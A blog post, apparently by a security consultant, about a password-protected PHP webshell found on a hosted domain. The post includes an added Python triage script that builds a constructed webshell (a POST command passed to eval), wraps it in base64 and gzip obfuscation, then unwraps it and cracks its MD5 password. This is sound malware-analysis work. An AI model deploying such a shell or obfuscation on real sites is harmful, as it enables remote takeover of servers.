PHP Infected

At a certain point as a Security Consultant / Ethical Hacker you may find that some other hackers are aiming at you and your domain.

Well, it happened. They were able to place some files on the shared hosting environment of my Internet site hoster. I found out that files had been placed when I received mails from SIDN that their "Netcraft Takedown Service" had found infected files inside my .zefat.nl domain.
(My www.zefat.nl domain is located on other servers.)

OK… Domain down.. Darn..
Looking at the folder on my hosted site I see the files and copy the content to my system for future investigation.

Let's put the script to the test:

(Screenshot: password-protected encrypted file, password request)

OK. Password. Let's try to decrypt the file.

The site https://www.unphp.net/ did a neat job, but was unable to decrypt the file correctly, as the decrypted file gave me an error 500 message.
(I’ll investigate that later)

BUT… the file starts somewhere with a "$auth_pass=" string. That looked like an MD5 hash. So, trying to decode it, I came across the password.
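The two steps above (peeling the eval(gzinflate(base64_decode(...))) wrapper that sites like unphp.net undo, then recovering the password behind $auth_pass) can be done offline without ever executing the PHP. The script below is an added example, not the infected file from this site and not code from unphp.net; the inner "shell", its password and the wordlist are constructed for the demo, and the packing format (raw DEFLATE + base64, as PHP's gzdeflate/gzinflate use) is an assumption about how the sample was wrapped.

```python
import base64
import hashlib
import re
import zlib

# Constructed sample: a minimal "shell" that gates access with the MD5 of a
# password, the way $auth_pass is used in common PHP webshells. Not the real file.
INNER_SHELL = (
    '<?php\n'
    '$auth_pass = "5f4dcc3b5aa765d61d8327deb882cf99";\n'  # md5("password")
    'if (md5($_POST["pass"]) !== $auth_pass) { die("Password"); }\n'
    'eval($_POST["cmd"]);\n'
)


def php_gzdeflate(data: bytes) -> bytes:
    """Raw DEFLATE with no zlib header, matching PHP's gzdeflate() output."""
    c = zlib.compressobj(wbits=-zlib.MAX_WBITS)
    return c.compress(data) + c.flush()


def pack_shell(src: str) -> str:
    """Wrap PHP source in one eval(gzinflate(base64_decode(...))) layer (assumed packing scheme)."""
    payload = base64.b64encode(php_gzdeflate(src.encode())).decode()
    return f'<?php eval(gzinflate(base64_decode("{payload}")));'


PACKED_SHELL = pack_shell(INNER_SHELL)

# One obfuscation layer: eval(gzinflate(base64_decode("<base64>")))
_LAYER = re.compile(
    r'eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*\)'
)

# $auth_pass = "<32 hex chars>"  (MD5 of the shell password)
_AUTH = re.compile(r'\$auth_pass\s*=\s*["\']([0-9a-fA-F]{32})["\']')


def unwrap(src: str, max_layers: int = 10) -> tuple[str, int]:
    """Statically peel eval/gzinflate/base64 layers; the PHP is never executed."""
    layers = 0
    while layers < max_layers:
        m = _LAYER.search(src)
        if not m:
            break
        raw = base64.b64decode(m.group(1))
        src = zlib.decompress(raw, -zlib.MAX_WBITS).decode("utf-8", "replace")
        layers += 1
    return src, layers


def extract_auth_hash(src: str):
    """Return the lowercase MD5 stored in $auth_pass, or None if absent."""
    m = _AUTH.search(src)
    return m.group(1).lower() if m else None


def crack_md5(digest: str, wordlist):
    """Dictionary attack: unsalted MD5 is cheap to match against a wordlist."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


# Constructed wordlist; a real run would use a large list (rockyou etc.).
WORDLIST = ["admin", "123456", "password", "r57", "c99"]


def triage(packed_src: str) -> dict:
    """Unwrap, pull the auth hash, try to crack it; returns what an analyst wants to log."""
    src, layers = unwrap(packed_src)
    digest = extract_auth_hash(src)
    return {
        "layers": layers,
        "auth_hash": digest,
        "password": crack_md5(digest, WORDLIST) if digest else None,
    }


if __name__ == "__main__":
    print(triage(PACKED_SHELL))
```

Feed the real file's contents to triage(); if it reports a hash but no password, the MD5 is not in the wordlist and needs a larger list or a hash-lookup service, which is effectively what the author did. The unwrap loop is bounded so a deliberately self-referential sample cannot spin forever.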


(Screenshot: password-protected encrypted file, GUI after login)

Working!!

As a trained eye can see, you can do a lot with this file.

Testing this at home got me puzzled for a moment, as nothing was fully working, which looked odd as they had put a lot of effort into the script.
But the reason for that was that I have a firewall segmenting all my networks. The server running this file was in a /29 "virus" network with no way to reach the outside, and my system was protected with AV profiles.

Disabling AV in my policy made the script work.

So I may conclude my hosting provider has no, or nearly no, security / firewalling between its servers and the Internet.

To be continued…